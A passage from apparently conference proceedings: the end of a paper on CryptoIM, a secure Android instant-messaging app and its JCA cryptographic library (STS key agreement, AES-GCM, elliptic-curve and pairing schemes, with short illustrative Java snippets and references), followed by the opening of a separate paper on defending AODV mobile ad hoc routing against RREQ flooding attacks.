protocol for session key agreement and a cryptographic
transaction for transporting encrypted messages. Therefore,
CryptoIM is able to transport encrypted information through
public services offered by providers such as Google (for
Gtalk or Hangouts) and WhatsApp.
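The layering just described can be sketched as follows. The interface and class names here are hypothetical (the paper does not name its classes); the point is that encryption happens strictly before any XMPP transport sees the payload, which is what makes the scheme end-to-end:

```java
// Hypothetical abstraction of an XMPP transport (Gtalk, Hangouts, etc.).
interface XmppTransport {
    void send(String to, String payload);
}

// Hypothetical abstraction of CryptoIM's cryptographic layer.
interface MessageCipher {
    String encrypt(String plaintext);
}

class SecureMessenger {
    private final XmppTransport transport;
    private final MessageCipher cipher;

    SecureMessenger(XmppTransport t, MessageCipher c) {
        this.transport = t;
        this.cipher = c;
    }

    // Encrypt first, then transport: the public provider only ever
    // carries ciphertext.
    void sendSecure(String to, String message) {
        transport.send(to, cipher.encrypt(message));
    }
}
```

Because the security layer sits above the transport, any XMPP-compatible service can carry the encrypted payload unchanged.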
The usage scenario that inspired the implementation of
CryptoIM was to secure end-to-end communication, as
described before. The two sides of communication (Alice
and Bob) want to use their mobile device to exchange
confidential and authentic messages. In CryptoIM, when a
user selects a contact she wants to talk to, the protocol for
secure conversation is initiated behind the scenes. The
following action flow can be observed in Figure 1:
1) User 1 enters the application;
2) User 2 enters the application;
3) User 1 opens a conversation with User 2;
4) User 2 accepts the conversation;
5) Security negotiation occurs;
6) Secure conversation proceeds as expected.
This basic flow represents the simplest behavior needed
for secure conversation. A secure conversation can be
canceled by either party by sending a cancellation message.
Figure 2. Station to Station (STS) protocol.
The security negotiation phase is indeed a protocol for key
agreement, as illustrated by Figure 2.
B. Selection of cryptographic services
To accomplish the above mentioned scenario, Alice and
Bob choose to use cryptographically secure communication
with the following general requirements:
- An authentication mechanism for individual messages;
- An encryption algorithm and modes of operation;
- A key agreement protocol;
- A mechanism to protect cryptographic keys at rest.
In addition to a unique key for each conversation, which
ensures the security of the exchange of messages, a unique IV is
generated for each exchanged message. To ensure that the
protocol is followed transparently, without user
interference, the key-negotiation messages are sent automatically
behind the scenes, so that the user does not see them.
This prevents the user from trying
to interfere in the key agreement process.
To avoid known security issues in instant messaging
applications [36][39], the key agreement protocol must
provide the security properties described below [47]:
a) Mutual authentication of entities. For this property to be
sustained in the protocol, signed messages must include
the identities of both participants;
b) Mutually authenticated key agreement. The shared
secret is a result of the underlying Key Agreement (KA)
protocol. The freshness or novelty of the secret is the
result of choosing random values for each conversation.
The authenticity of secret sharing is guaranteed by
digital signatures;
c) Mutual confirmation of secret possession. Decryption
using a derived secret key confirms possession of the
secret and evidences that the entity with knowledge of
the secret is the same one signing the agreement
messages. After a run of the protocol, the two
participants observe each other performing encryption
with the shared secret key;
d) Perfect Forward Secrecy (PFS). If a private key is
compromised at some point in time, the security of
session keys previously established is not affected. It is
important for the maintenance of this property that the
intermediate values are discarded and safely deleted at
the end of a protocol run;
e) Anonymity. If the certificates are encrypted and the
identities are omitted in the body of messages, a third
party observing the communication network cannot
directly identify the interlocutors.
The cryptographic library supporting CryptoIM was
designed to meet each one of these general requirements,
resulting in an extensive implementation.
IV. DESCRIPTION OF THE IMPLEMENTATION
As a general goal, the CryptoIM cryptographic library is
intended to be used in the protection of cryptographically
secure communication via mobile devices. In order to be
useful, the cryptographic library had to accomplish a
minimum set of functional requirements. Each functional
requirement generated a set of non-functional or
supplementary requirements, mostly related to correctness of
algorithms, compliance to industry standards, security, and
performance of the implementation.
In order to facilitate the portability of the cryptographic
library to mobile devices, in particular the Android
platform, the implementation follows the standard
cryptographic Application Programming Interface (API)
for Java, the Java Cryptography Architecture (JCA),
its naming conventions, and design principles [16][20]-[23].
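The JCA conventions in question look like this in practice: algorithms are requested by standard name through engine classes, and a CSP can be registered and selected explicitly. The provider class name below is hypothetical; the paper does not state the registered name of its CSP:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;

public class JcaUsage {
    public static void main(String[] args) throws Exception {
        // Security.addProvider(new CryptoImProvider()); // hypothetical CSP registration
        KeyGenerator kg = KeyGenerator.getInstance("AES"); // standard algorithm name
        kg.init(128);
        // JCA "algorithm/mode/padding" transformation naming convention:
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, kg.generateKey());
        System.out.println(c.getAlgorithm()); // prints AES/CBC/PKCS5Padding
    }
}
```

Following these naming and engine-class conventions is what lets a custom provider slot in beside BouncyCastle and the Oracle providers without changing application code.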
Once JCA was defined as the architectural framework,
the next design decision was to choose the algorithms
minimally necessary to implement a scenario of secure
communication via mobile devices. The choice of a
minimum set was an important design decision in order to
provide a fully functional Cryptographic Service Provider
(CSP) in a relatively short period of time. This minimalist
construction had to provide the following set of cryptographic
functions:
a) A symmetric algorithm to be used as block cipher,
along with the corresponding key generation function,
and modes of operation and padding;
b) An asymmetric algorithm for digital signatures, along
with the key-pair generation function. This requirement
brings with it the need for some sort of digital
certification of public keys;
c) A one-way secure hash function. This is a support
function to be used in MACs, signatures and PRNGs;
d) A Message Authentication Code (MAC), based on a
secure hash or on a block cipher;
e) A key agreement mechanism or protocol to be used by
communicating parties that have never met before, but
need to share an authentic secret key;
f) A simple way to keep keys safe at rest and that does not
depend on hardware features;
g) A Pseudo-Random Number Generator (PRNG) to be
used by all the key generation functions.
The current version of this implementation is illustrated
by Figure 3 and presents the cryptographic algorithms and
protocols described in the following paragraphs. The figure
shows that frameworks, components, services and
applications are all on top of JCA API. CryptoIM’s
Cryptographic Service Provider (CSP) is in the middle, along
with the BouncyCastle and Oracle providers. Arithmetic
libraries are at the bottom.
Figure 3. Cryptographic Service Provider Architecture.
Figure 3 shows the CryptoIM CSP divided into two distinct
cryptographic libraries. The left side shows only
standardized algorithms and comprises a conventional
cryptographic library. The right side features only
non-standard cryptography and is an alternative library. The
following subsections describe these two libraries.
A. Standard Cryptography
This subsection details the implementation choices for
the standard cryptographic library. The motivations behind
this implementation were all characteristics of standardized
algorithms: interoperability, documentation, and testability.
The programming language chosen for implementation of
this cryptographic library was Java. The standard
cryptography is a pure-Java library according to JCA.
The block cipher is the AES algorithm, which was
implemented along with three modes of operation: ECB and CBC
[30], as well as the GCM mode for authenticated encryption
[31]. PKCS#5 [5] is the simplest padding mechanism and
was chosen for compatibility with other CSPs. As GCM
mode uses only AES encryption, the optimization of
encryption received more attention than decryption.
Implementation aspects of AES and other algorithms can be
found in the literature [17][28][43]. This AES
implementation was inspired by [33].
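The AES/GCM service can be exercised through the standard JCA engine classes. The sketch below is not the paper's code; it assumes any provider supporting AES/GCM (e.g., the JDK's SunJCE in Java 8+), and the 96-bit IV and 128-bit tag sizes are common choices rather than values taken from the paper:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.security.SecureRandom;

public class GcmDemo {
    static byte[] seal(SecretKey key, byte[] iv, byte[] plaintext) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv)); // 128-bit tag
        return c.doFinal(plaintext); // ciphertext with the auth tag appended
    }

    static byte[] open(SecretKey key, byte[] iv, byte[] sealed) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));
        return c.doFinal(sealed); // throws AEADBadTagException on tampering
    }

    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(128);
        SecretKey key = kg.generateKey();
        byte[] iv = new byte[12];        // 96-bit IV, unique per message
        new SecureRandom().nextBytes(iv);
        byte[] sealed = seal(key, iv, "top secret".getBytes());
        System.out.println(new String(open(key, iv, sealed))); // prints top secret
    }
}
```

Note that GCM needs only a unique IV per key, which is the "minimized IV management burden" argued for earlier in the text.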
The asymmetric algorithm is the RSA Probabilistic
Signature Scheme (RSA-PSS), built over the RSA signature
algorithm. PSS is believed to be more secure than ordinary
RSA [27][43]. Asymmetric encryption is provided by RSA
Optimal Asymmetric Encryption Padding (RSA-OAEP) [27][43].
Two cryptographically secure hashes were implemented:
Secure Hash Algorithm 1 (SHA-1) [26] and Message
Digest 5 (MD5). It is well known by now that MD5 is
considered broken and must not be used in serious
applications; it is present only for ease of implementation. In
the current version, there is no intended direct use for these two
hashes. Their primary use is as the underlying hash function in
MACs, digital signatures, and PRNGs. The MACs chosen
were the Hash MAC (HMAC) [29], with SHA-1 as the
underlying hash function, and the Galois MAC (GMAC) [31],
which can be directly derived from GCM mode. The Secure
Hash Algorithm 2 (SHA-2) family of secure hashes supplies
the need for direct use of single hashes.
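For illustration, HMAC with SHA-1 is available through the JCA Mac engine; this short sketch is illustrative of the interface, not code from the paper's CSP, and the key bytes are placeholders:

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class HmacDemo {
    // Computes an HMAC-SHA1 authentication tag over a message.
    static byte[] tag(byte[] key, byte[] message) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(key, "HmacSHA1"));
        return mac.doFinal(message); // 20-byte tag (SHA-1 output size)
    }

    public static void main(String[] args) throws Exception {
        byte[] t = tag("key".getBytes(), "message".getBytes());
        System.out.println(t.length); // prints 20
    }
}
```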
The need for a Key Agreement (KA) was fulfilled by the
implementation of Station-to-Station (STS) protocol (Figure
2), which is based on Authenticated Diffie-Hellman (ADH)
[45], and provides mutual key authentication and key
confirmation [6][46].
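The Diffie-Hellman core of STS can be sketched with the JCA KeyAgreement engine. A full STS run additionally exchanges signatures over both public values, encrypted under the derived key (Figure 2); this minimal sketch shows only the shared-secret derivation, and its class and method names are illustrative:

```java
import javax.crypto.KeyAgreement;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PublicKey;

public class StsCore {
    // Derives the DH shared secret from our key pair and the peer's public value.
    static byte[] sharedSecret(KeyPair mine, PublicKey theirs) throws Exception {
        KeyAgreement ka = KeyAgreement.getInstance("DH");
        ka.init(mine.getPrivate());
        ka.doPhase(theirs, true);   // single-phase Diffie-Hellman
        return ka.generateSecret(); // both sides derive the same bytes
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DH");
        kpg.initialize(2048);       // both pairs share the generator's DH parameters
        KeyPair alice = kpg.generateKeyPair();
        KeyPair bob = kpg.generateKeyPair();
        byte[] a = sharedSecret(alice, bob.getPublic());
        byte[] b = sharedSecret(bob, alice.getPublic());
        System.out.println(java.util.Arrays.equals(a, b)); // prints true
    }
}
```

STS then authenticates this exchange by having each party sign both public values and encrypt the signature under a key derived from the shared secret, which yields the mutual authentication and key confirmation properties cited above.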
Finally, the mechanism for Password-Based Encryption
(PBE) is based on the Password-Based Key Derivation
Function 2 (PBKDF2) [5], and provides a simple and secure
way to store keys in encrypted form. In PBE, a
key-encryption-key is derived from a password.
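As a sketch of this PBE mechanism, PBKDF2 is available in JCA through SecretKeyFactory. The salt and iteration count below are illustrative assumptions, not values from the paper; a real deployment would store a random salt alongside the encrypted keys:

```java
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

public class PbeDemo {
    // Derives a key-encryption-key (KEK) from a password with PBKDF2.
    static SecretKey deriveKek(char[] password, byte[] salt) throws Exception {
        SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        // 10000 iterations, 128-bit output (illustrative parameters).
        PBEKeySpec spec = new PBEKeySpec(password, salt, 10000, 128);
        byte[] keyBytes = f.generateSecret(spec).getEncoded();
        return new SecretKeySpec(keyBytes, "AES"); // use derived bytes as an AES key
    }

    public static void main(String[] args) throws Exception {
        SecretKey kek = deriveKek("correct horse".toCharArray(), "salt1234".getBytes());
        System.out.println(kek.getEncoded().length); // prints 16
    }
}
```

The derived KEK then encrypts the stored keys, so no long-term key ever rests on the device in plaintext and no hardware key store is required.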
B. Non-standard Cryptography
This subsection details the implementation choices for
the alternative cryptographic library. The motivation behind
the special attention given to the selection of alternative
cryptographic algorithms was the recently revealed
weaknesses intentionally included by foreign intelligence
agencies in international encryption standards [19]. This fact
alone raises doubts about the trustworthiness of all standardized
algorithms, which are internationally adopted.
In this context, a need arose to treat what has been called
“alternative cryptography” in opposition to standardized
cryptographic schemes. The final intent was strengthening
the implementation of advanced cryptography and fostering
their use. The non-standard cryptography is packaged as a
dynamic library written in C and accessible to Java programs
through a Java Native Interface (JNI) connector, which acts
as a bridge to a JCA adapter.
At the time of writing, this alternative library was in
the final steps of its construction. It provides advanced
mathematical concepts, such as bilinear pairings and elliptic
curves, which are not fully standardized by foreign
organizations and undergo constant improvement. The most
advanced cryptographic protocols currently implemented are
based on a reference implementation [8] and listed below.
a) Elliptic Curve Diffie-Hellman (ECDH) [11]. The key
agreement protocol ECDH is a variation of the Diffie-Hellman
(DH) protocol using elliptic curves as the
underlying algebraic structure.
b) Elliptic Curve Digital Signature Algorithm (ECDSA)
[25]. This is a DSA-based digital signature using elliptic
curves. ECSS [11] is a variant of ECDSA.
c) Sakai-Ohgishi-Kasahara (SOK) [37]. This protocol is a
key agreement for Identity-Based Encryption (IBE). It is
also called SOKAKA (SOK Authenticated Key
Agreement).
d) Boneh-Lynn-Shacham (BLS) [9]. A short digital
signature scheme in which, given a message m and a
private key x, the signature is computed as S = x·H(m),
where H(m) is a point on an elliptic curve produced by
a secure hash function H().
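For context, BLS verification relies on a bilinear pairing e; in the scheme's usual description (recalled here for completeness, not spelled out in the paper), a signature S is checked against the public key P = x·G, with G a generator, via the pairing equation:

    e(S, G) = e(x·H(m), G) = e(H(m), x·G) = e(H(m), P).

The signature is a single curve point, which is what makes it "short".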
e) Zhang-Safavi-Susilo (ZSS) [14]. Similar to the previous
case, it is a more efficient short signature, because it
utilizes fixed-point multiplication on an elliptic curve
rather than arbitrary-point multiplication.
Figure 4. Key agreement for secure conference.
f) BLAKE [41]. A cryptographic hash function submitted to
the worldwide contest for selecting the new SHA-3
standard. It was ranked among the five finalists of this
competition.
g) Elliptic Curve Integrated Encryption Scheme (ECIES)
[11]. An asymmetric encryption algorithm over
elliptic curves. This algorithm is non-deterministic and
can be used as a substitute for RSA-OAEP, with the
benefit of shorter cryptographic keys.
h) Elliptic Curve Station-to-Station (ECSTS) [11].
Variation of STS protocol using elliptic curves and
ECDH as a replacement for ADH.
i) Salsa20 [18]. This is a family of 256-bit stream ciphers
submitted to the ECRYPT Project (eSTREAM).
j) Serpent [40]. A 128-bit block cipher designed to be a
candidate to the contest that chose the AES. Serpent did
not win, but it was the second finalist and enjoys good
reputation in the cryptographic community.
C. Evaluation of standard and non-standard cryptography
A previous work [2] identified a lack of alternative
cryptography in public libraries, such as non-standard elliptic
curves and bilinear pairings. This prototype attempts to
fill this gap by offering alternatives to possibly
compromised standards. Its construction has been discussed
in a recent paper [1]; only key points are recalled here.
Considering security, protection against side-channel
attacks was an important issue in the choice of alternative
cryptography. Schemes with known issues were avoided,
while primitives constructed to resist such attacks were
preferred. Also, the library offers alternatives for
256-bit security in both symmetric and asymmetric
encryption. For instance, in symmetric encryption,
Serpent-256 replaces AES-256. In asymmetric encryption, the same
security level is achieved by elliptic curves over 521-bit
finite fields, replacing standard RSA with 15360-bit keys.
Considering performance measurements, experiments [1]
have shown that the standard cryptography can be competitive
with other implementations. Also, at higher security levels, the
performance of non-standard elliptic-curve cryptography is
significantly better than the standard alternative. In contrast,
non-standard pairing-based cryptography has shown
relatively low performance. Figure 6 illustrates this behavior
for signature operations on a Samsung Galaxy S III (1.4 GHz
quad-core Cortex-A9, 1 GB RAM, and 16 GB storage).
Complete results can be found in [1].
The responsiveness shown by the prototype is quite
competitive, and usage has shown that the delay caused by
key negotiation is negligible on a local wireless
network (Wi-Fi) with a household deployment of an XMPP
server with few users. However, additional effort is needed
to optimize the mobile app as well as to improve
both performance and scalability of the server-side application.
V. IMPROVEMENTS UNDER DEVELOPMENT
At the time of writing, two improvements were under
construction. The first is a mobile PKI responsible for digital
certification, fully integrated into the mobile security
framework. The PKI's server side is based upon the EJBCA PKI
[13]. The client side follows recent recommendations for
handling certificates on mobile devices [38].
The second is a secure text conference (or group chat) via
instant messages. As depicted in Figure 4, the Organizer or
Chair of the conference requests the conference creation from
the Server, an ordinary XMPP feature. The key
agreement for the requested conference proceeds as follows,
where Enck(x) means encryption of x with key k:
1. Chair (C) creates the key for that conference (ck);
2. For each guest (g[i]), Chair (C) does:
   a) Opens an STS channel with g[i], establishing key k: C ↔ g[i], key k;
   b) Sends ck at time t to g[i]: C → g[i]: Enck(ck).
The steps above constitute a point-to-point key transport
using symmetric encryption, which is provided by the STS
protocol. After that, all guests share the same conference key
and the conference proceeds as a multicast of all encrypted
messages. Figure 5 shows a screenshot for a secure
conference, in which users are differentiated by colors. Both
the conversation and the interface are in Portuguese.
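The Chair's side of this key transport can be sketched as follows. Class and method names are hypothetical; the per-guest STS keys are assumed to be already established, and plain AES (ECB by default) stands in for Enck(ck) only to keep the sketch short, where the paper's library would wrap the key with an authenticated mode:

```java
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import java.util.HashMap;
import java.util.Map;

public class ConferenceChair {
    // Encrypts the conference key ck once per guest, under that guest's STS key.
    static Map<String, byte[]> distribute(SecretKey ck, Map<String, SecretKey> stsKeys)
            throws Exception {
        Map<String, byte[]> wrapped = new HashMap<>();
        for (Map.Entry<String, SecretKey> guest : stsKeys.entrySet()) {
            Cipher c = Cipher.getInstance("AES"); // AES/ECB/PKCS5Padding by default
            c.init(Cipher.ENCRYPT_MODE, guest.getValue());
            // C -> g[i]: Enc_k(ck)
            wrapped.put(guest.getKey(), c.doFinal(ck.getEncoded()));
        }
        return wrapped;
    }
}
```

After each guest decrypts its copy, all parties hold the same ck and the conference proceeds as a multicast of messages encrypted under it.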
VI. CONCLUDING REMARKS
This paper discussed design and implementation issues
in the construction of a cryptographically secure Instant
Messaging application for Android and the underlying
cryptographic library that supports it. The text has shown
how cryptographic services can be crafted to fit a secure IM
service in a way that is transparent to the end user, without
sacrificing security. A well-defined architecture allowed the
selection and use of non-standard cryptography.
Future work includes other cryptographically secure
services, such as SMS, group chat, and mobile PKI, as well
as protections against side-channels and vulnerabilities of
insecure programming. Also, performance over 3G networks
is being measured and analyzed, for future improvements.
ACKNOWLEDGMENT
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
Mobile Environments – TSAM", granted by the Fund for
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11.0028.00 with the Financier of
Studies and Projects – FINEP/MCTI.
Figure 5. Screenshot of a secure text conference (group chat).
REFERENCES
[1] A. M. Braga and E. M. Morais, "Implementation Issues in the
Construction of Standard and Non-Standard Cryptography on
Android Devices," The Eighth International Conference on Emerging
Security Information, Systems and Technologies (SECURWARE
2014), in press.
[2] A. Braga and E. Nascimento, Portability evaluation of cryptographic
libraries on android smartphones. In Proceedings of the 4th
international conference on Cyberspace Safety and Security (CSS'12),
Yang Xiang, Javier Lopez, C.-C. Jay Kuo, and Wanlei Zhou (Eds.).
Springer-Verlag, Berlin, Heidelberg, 2012, pp. 459-469.
[3] A. M. Braga, “Integrated Technologies for Communication Security
on Mobile Devices”, The Third International Conference on Mobile
Services, Resources, and Users (Mobility) , 2013, pp. 47–51.
[4] A. M. Braga, E. N. Nascimento, and L. R. Palma, “Presenting the
Brazilian Project TSAM – Security Technologies for Mobile
Environments”, Proceeding of the 4th International Conference in
Security and Privacy in Mobile Information and Communication
Systems (MobiSec 2012). LNICST, vol. 107, 2012, pp. 53-54.
[5] B. Kaliski, “PKCS #5: Password-Based Cryptography Specification”,
Version 2.0, RFC 2898. Retrieved [July 2014] from
tools.ietf.org/html/rfc2898.
[6] B. O'Higgins, W. Diffie, L. Strawczynski, and R do Hoog,
"Encryption and ISDN - A Natural Fit", International Switching
Symposium (ISS87), 1987.
[7] B. Xuefu and Y. Ming, “Design and Implementation of Web Instant
Message System Based on XMPP”, Proc. 3rd International
Conference on Software Engineering and Service Science (ICSESS),
Jun. 2012, pp. 83-88.
[8] D. Aranha and C. Gouvêa, "RELIC Toolkit". Retrieved [July 2014]
from code.google.com/p/relic-toolkit.
[9] D. Boneh, B. Lynn, and H. Shacham, “Short signatures from the Weil
pairing”, J. Cryptology, 17(4), Sept. 2004, pp. 297–319.
[10] D. Bornstein, Dalvik VM Internals. Retrieved [July 2014] from
sites.google.com/site/io/dalvik-vm-internals.
[11] D. Hankerson, A. J. Menezes, and S. Vanstone. Guide to Elliptic
Curve Cryptography, Springer-Verlag, New York, Inc., Secaucus, NJ,
USA, 2003.
[12] D. T. Massandy and I. R. Munir, “Secured Video Streaming
Development on Smartphones with Android Platform”, Proc. 7th
International Conference on Telecommunication Systems, Services,
and Applications (TSSA), Oct. 2012, pp. 339-344.
[13] EJBCA PKI CA. Retrieved [July 2014] from http://www.ejbca.org.
[14] F. Zhang, R. Safavi-Naini, and W. Susilo, “An Efficient Signature
Scheme from Bilinear Pairings and Its Applications”, in F. Bao, R. H.
Deng and J. Zhou, ed., 'Public Key Cryptography', 2004, pp. 277-290.
[15] H. Krawczyk, "SIGMA: The 'SIGn-and-MAc' approach to
authenticated Diffie-Hellman and its use in the IKE protocols,"
Advances in Cryptology - CRYPTO 2003, Springer Berlin Heidelberg,
2003, pp. 400-425.
[16] How to Implement a Provider in the Java Cryptography Architecture.
Retrieved [July 2014] from docs.oracle.com/javase/7/docs/technotes/
guides/security/crypto/HowToImplAProvider.html.
[17] J. Bos, D. Osvik, and D. Stefan, “Fast Implementations of AES on
Various Platforms”, 2009. Retrieved [July 2014] from
eprint.iacr.org/2009/501.pdf.
[18] J. D. Bernstein, The Salsa20 family of stream ciphers. Retrieved [July
2014] from cr.yp.to/papers.html#salsafamily.
[19] J. Menn, Experts report potential software "back doors" in U.S.
standards. Retrieved [July 2014] from http://www.reuters.com/article
/2014/07/15/usa-nsa-software-idUSL2N0PP2BM20140715?irpc=932.
[20] Java Cryptography Architecture (JCA) Reference Guide. Retrieved
[July 2014] from docs.oracle.com/javase/7/docs/technotes/guides/
security/crypto/CryptoSpec.html.
[21] Java Cryptography Architecture Oracle Providers Documentation for
Java Platform Standard Edition 7. Retrieved [July 2014] from
docs.oracle.com/javase/7/docs/technotes/guides/security/SunProvider
s.html.
[22] Java Cryptography Architecture Standard Algorithm Name
Documentation for Java Platform Standard Edition 7. Retrieved [July
2014] from docs.oracle.com/javase/7/docs/technotes/guides/security/
StandardNames.html.
[23] Java Cryptography Extension Unlimited Strength Jurisdiction Policy
Files 7 Download. Retrieved [July 2014] from www.oracle.com/
technetwork/java/javase/downloads/jce-7-download-432124.html.
[24] M. Egele, D. Brumley, Y. Fratantonio, and C. Kruegel, “An empirical
study of cryptographic misuse in android applications,” Proceedings
of the 2013 ACM SIGSAC conference on Computer and
Communications Security (CCS ’13), 2013, pp. 73–84.
[25] NIST FIPS PUB 186-2. Digital Signature Standard (DSS). Retrieved
[July 2014] from csrc.nist.gov/publications/fips/archive/fips186-2/fips186-2.pdf.
[26] NIST FIPS-PUB-180-4. Secure Hash Standard (SHS). March 2012.
Retrieved [July 2014] from csrc.nist.gov/publications/fips/fips180-4/fips-180-4.pdf.
[27] NIST FIPS-PUB-186. Digital Signature Standard (DSS). Retrieved
[July 2014] from csrc.nist.gov/publications/fips/archive/fips186-2/fips186-2.pdf.
[28] NIST FIPS-PUB-197. Announcing the ADVANCED ENCRYPTION
STANDARD (AES). Federal Information Processing Standards
Publication 197 November 26, 2001.
[29] NIST FIPS-PUB-198. The Keyed-Hash Message Authentication
Code (HMAC). Retrieved [July 2014] from
csrc.nist.gov/publications/fips/fips198/fips-198a.pdf.
[30] NIST SP 800-38A. Recommendation for Block Cipher Modes of
Operation. 2001. Retrieved [July 2014] from
csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf.
Figure 6. Time measurements for signature algorithms: signing (s) and verification (v) times in ms.
[31] NIST SP 800-38D. Recommendation for Block Cipher Modes of
Operation: Galois/Counter Mode (GCM) and GMAC. 2007.
csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf.
[32] Off-the-Record Messaging webpage. Retrieved [July 2014] from
otr.cypherpunks.ca.
[33] P. Barreto, AES Public Domain Implementation in Java. Retrieved
[July 2014] from www.larc.usp.br/~pbarreto/JAES.zip.
[34] P. Gutmann, “Lessons Learned in Implementing and Deploying
Crypto Software,” Usenix Security Symposium, 2002.
[35] P. Saint-Andre, K. Smith, and R. Tronçon, “XMPP: The Definitive
Guide - Building Real-Time Applications with Jabber Technologies”,
O’reilly, 2009.
[36] Piercing Through WhatsApp's Encryption. Retrieved [July 2014]
from blog.thijsalkema.de/blog/2013/10/08/piercing-through-whatsapp-s-encryption.
[37] R. Sakai, K. Ohgishi, and M. Kasahara. “Cryptosystems based on
pairing”. The 2000 Symposium on Cryptography and Information
Security (SCIS 2000), Okinawa, Japan, January 2000, pp. 26–28.
[38] S. Fahl, M. Harbach, and H. Perl, “Rethinking SSL development in
an appified world,” Proceedings of the 2013 ACM SIGSAC
conference on Computer & communications security - CCS ’13
(2013), 2013, pp. 49–60.
[39] S. Schrittwieser et al., “Guess Who's Texting You? Evaluating the
Security of Smartphone Messaging Applications”. Proc. 19th
Network & Distributed System Security Symposium, Feb. 2012.
[40] SERPENT webpage, “SERPENT A Candidate Block Cipher for the
Advanced Encryption Standard”. Retrieved [July 2014] from
www.cl.cam.ac.uk/~rja14/serpent.html.
[41] SHA-3 proposal BLAKE webpage. Retrieved [July 2014] from
https://131002.net/blake.
[42] SpongyCastle webpage, Spongy Castle: Repackage of Bouncy Castle
for Android, Bouncy Castle Project (2012), Retrieved [July 2014]
from rtyley.github.com/spongycastle/
[43] T. St. Denis. “Cryptography for Developers”, Syngress, 2007.
[44] The Legion of the Bouncy Castle webpage. Legion of the Bouncy
Castle Java cryptography APIs. Retrieved [July 2014] from
www.bouncycastle.org/java.html.
[45] W. Diffie and M. Hellman, “New Directions in Cryptography”, IEEE
Transact. on Inform. Theory, vol. 22, no. 6, Nov. 1976, pp. 644-654.
[46] W. Diffie, P. C. van Oorschot, and M. J. Wiener, “Authentication and
Authenticated Key Exchanges”, Designs, Codes and Cryptography
(Kluwer Academic Publishers) 2 (2), 1992, pp. 107–125.
[47] W. Mao, “Modern cryptography: theory and practice”, Prentice Hall
PTR, 2004.
Resisting Flooding Attacks on AODV
Mohamed A. Abdelshafy and Peter J. B. King
School of Mathematical & Computer Sciences
Heriot-Watt University, Edinburgh, UK
{ma814, P.J.B.King}@hw.ac.uk
Abstract—AODV is a reactive MANET routing protocol that is
vulnerable to a dramatic collapse of throughput when malicious
intruders flood the network with bogus route requests. We
introduce a simple mechanism to resist such attacks that can
be incorporated into any reactive routing protocol. It does not
require expensive cryptography or authentication mechanisms,
but relies on locally applied timers and thresholds to classify
nodes as malicious. No modifications to the packet formats are
needed, so the overhead is a small amount of calculation at nodes,
and no extra communication. Using NS2 simulation, we compare
the performance of networks using AODV under flooding attacks
with and without our mechanism, showing that it significantly
reduces the effect of a flooding attack.
Keywords–MANET, Routing, AODV, Security, Attack, Flooding
I. INTRODUCTION
A Mobile Ad Hoc Network (MANET) is a decentralized
infrastructureless network in which nodes cooperate to forward
data from a source to a destination. Each node in a MANET
acts both as a router and as a host. Several routing protocols
have been designed for MANETs [1] to optimize network
routing performance. The major issues involved in designing
a routing protocol for a MANET are node mobility, a bandwidth-constrained
and error-prone wireless channel, resource-constrained
nodes, and dynamic changes of the network topology
[2].
MANET routing protocols can be classified as proactive or
reactive. In proactive (table-driven) routing
protocols, each node maintains one or more tables containing
routing information to every other node in the network. In
reactive (on-demand) routing protocols, routes are created
whenever a source needs to send data to a destination node,
which means these protocols are initiated by a source
on demand. In this paper, we focus on the AODV protocol
[3], one of the most extensively studied reactive protocols,
considered by the IETF for standardization.
AODV [3] is a reactive routing protocol. It uses destination
sequence numbers to ensure the freshness of routes and guarantee loop freedom. To find a path to a destination, a node
broadcasts a route request (RREQ) packet to its neighbors
using a new sequence number. Each node that receives the
broadcast sets up a reverse route towards the originator of
the RREQ unless it has a fresher one. When the intended
destination or an intermediate node that has a fresh route to the
destination receives the RREQ, it unicasts a reply by sending
a route reply (RREP) packet along the reverse path established
at intermediate nodes during the route discovery process. Then
the source node starts sending data packets to the destination
node through the neighboring node that first responded with
an RREP. When an intermediate node along the route moves,
its upstream neighbor will notice the route breakage due to the
movement and propagate a route error (RERR) packet to
each of its active upstream neighbors. Routing information is
stored only in the source node, the destination node, and the
intermediate nodes along the active route that handle data
transmission. This scenario decreases the memory overhead,
minimizes the use of network resources, and performs well in
high-mobility situations.
A MANET inherits the security threats faced in wired as
well as wireless networks and also introduces security attacks
unique to itself [2], due to its characteristics. The limitations
associated with battery-powered MANET nodes mean that
computationally expensive cryptographic techniques, such as
public key algorithms, are undesirable.
MANET routing protocols are designed on the assumption
that all nodes cooperate without maliciously disrupting the
operation of the protocol. However, the existence of malicious
nodes cannot be disregarded in any system, especially in
MANETs, because of the wireless nature of the network. A
malicious node can attack the network layer in a MANET
either by not forwarding packets or by changing parameters of
routing messages such as sequence numbers and IP addresses,
sending fake messages several times, or sending fake routing
information to cause congestion and so disrupt routing
operations. Node mobility also introduces the difficulty of
distinguishing between stale routes and fake routes. Attacks
on MANETs come in a number of classes [4], and a number
of defences to these attacks have been proposed and evaluated
by simulation [4]–[6]. Attacks against MANETs are classified
based on modification, impersonation, or fabrication of the
routing messages. While there is a large number of existing
attacks, this paper focuses on the flooding attack, which has a
dramatic impact on AODV [2][4].
In AODV under a flooding attack [7], a malicious node floods
the network with a large number of RREQs to non-existent
